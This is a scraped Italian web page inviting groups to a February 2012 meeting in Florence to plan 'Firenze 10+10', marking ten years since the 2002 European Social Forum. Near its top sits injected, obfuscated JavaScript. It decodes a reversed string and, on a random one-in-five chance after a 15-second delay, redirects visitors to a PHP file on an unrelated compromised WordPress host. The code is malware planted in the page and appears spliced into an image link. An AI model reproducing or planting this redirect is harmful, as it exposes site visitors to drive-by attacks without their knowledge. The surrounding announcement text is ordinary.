Sabato, insieme per costruire Firenze 10+10 dal Forum Sociale Europeo

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2012/02/forum-sociale-europeo.gif”>Invito alla partecipazione

Sabato 18 febbraio
dalle 10, 30 alle 17,30
c/o Arci, piazza dei Ciompi 11, Firenze

Siamo partiti dal territorio e dal tessuto locale per verificare prima di tutto la possibilità di mettere in piedi un simile percorso nella nostra città. La risposta è stata entusiasmante e larga. Questa lettera vuole essere il passo seguente: è l’invito a costruire e progettare tutt* insieme, nei prossimi mesi, il processo collettivo verso Firenze 2012.

Appello: Forum Sociale Europeo 2002. Un invito: verso Firenze 10+10

La finanza speculativa, il debito degli Stati, le economie solidali, la questione di genere, la sovranità alimentare, i migranti, la guerra, la riconversione ecologica, i beni comuni, i diritti dei cittadini e delle cittadine, la democrazia… dieci anni fa, tra il 6 e il 10 novembre del 2002, Firenze ospitò un enorme spazio di dibattito pubblico, aperto e inclusivo: il primo Forum Sociale Europeo, che si concluse con una grande e festosa manifestazione lungo le strade della città.

Protagonisti della discussione politica, degli incontri, dei confronti, dell’iniziativa comune furono linguaggi e pratiche diverse: la partecipazione popolare, il conflitto sociale, la nonviolenza, la cittadinanza attiva, il volontariato, la cultura, la musica, il teatro.

A dieci anni di distanza i contenuti dibattutti all’epoca da oltre 60.000 persone in centinaia di incontri sono più che mai attuali. In questo decennio i movimenti sociali hanno mutato la loro pelle, si sono trasformati, hanno saputo costruire pratiche virtuose e campagne in grado di smontare l’assurdità e la pericolosità del sistema neoliberista, causa principale della crisi che stiamo vivendo.

Oggi chi soffre la globalizzazione è ancora in piazza in tutto il mondo e grida “rise up-solleviamoci”, ha preso il nome di movimento degli “indignados” e non accetta di subire gli effetti perversi della crisi restando in silenzio.

Nelle ultime settimane del 2011 reti, gruppi e movimenti fiorentini si sono ritrovati con un intento condiviso: avviare un percorso inclusivo che ricostruisca a Firenze, nel novembre del 2012, uno spazio collettivo di discussione. Non una celebrazione di ciò che fu il Forum Europeo ma un’occasione – resa più urgente dalla profonda crisi economica, sociale ed ambientale in cui siamo immersi- per ricostruire legame, azione, riflessione e progetto per un’ Europa sociale e dei beni comuni.

Siamo partiti dal territorio e dal tessuto locale per verificare prima di tutto la possibilità di mettere in piedi un simile percorso nella nostra città. La risposta è stata entusiasmante e larga. Questa lettera vuole essere il passo seguente: è l’invito a costruire e progettare tutt* insieme, nei prossimi mesi, il processo collettivo verso Firenze 2012.

L’invito è rivolto a coloro che furono con noi protagonisti del FSE del 2002, ma anche a tutti i gruppi e i soggetti sociali che si sono affacciati sulla scena nazionale ed internazionale nel corso di questo decennio: insieme abbiamo davanti un altro decennio di lavoro comune.

Vi proponiamo d’incontrarci sabato 18 febbraio a Firenze, dalle 10,30 alle 17,30 presso la sede dell’Arci, in piazza dei Ciompi 10.30.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *